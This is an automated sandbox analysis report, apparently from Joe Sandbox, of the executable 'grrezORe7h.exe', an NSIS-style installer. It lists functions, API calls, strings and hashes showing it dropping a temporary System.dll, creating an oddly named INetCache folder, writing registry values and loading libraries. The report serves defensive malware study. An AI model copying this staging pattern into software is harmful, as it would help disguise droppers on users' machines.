Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\grrezORe7h.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\grrezORe7h.exe,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67

Strings

Null, xrefs: 00402EE5
Error launching installer, xrefs: 00402E3E
(*B, xrefs: 00402E7C
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
"C:\Users\user\Desktop\grrezORe7h.exe", xrefs: 00402DF4
soft, xrefs: 00402EDC
C:\Users\user\Desktop\grrezORe7h.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
Inst, xrefs: 00402ED3

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\grrezORe7h.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3844313462
Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets,?,?,00000031), ref: 004017CD

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Strings

C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll, xrefs: 0040182D, 00401849
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets, xrefs: 00401796
C:\Users\user\AppData\Local\Temp\nsuC465.tmp, xrefs: 00401819, 00401837
Call, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets$C:\Users\user\AppData\Local\Temp\nsuC465.tmp$C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll$Call
API String ID: 1941528284-3966245810
Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

... %d%%, xrefs: 0040316E
jA, xrefs: 004031F1
jA, xrefs: 004030E7

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: jA$ jA$... %d%%
API String ID: 551687249-2167919867
Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

C:\Users\user\AppData\Local\Temp\nsuC465.tmp, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsuC465.tmp
API String ID: 1356686001-2730403437
Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
GetLastError.KERNEL32 ref: 004056DA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
GetLastError.KERNEL32 ref: 004056F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Function 00405C59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C77
GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5E
nsa, xrefs: 00405C66

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
wsprintfW.USER32 ref: 00406411
LoadLibraryW.KERNELBASE(?), ref: 00406421

Strings

%s%S.dll, xrefs: 0040640B

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets
API String ID: 1892508949-3638503147
Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D

Function 00405128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405157
CallWindowProcW.USER32(?,?,?,?), ref: 004051A8

Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177

Strings

, xrefs: 00405138

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin
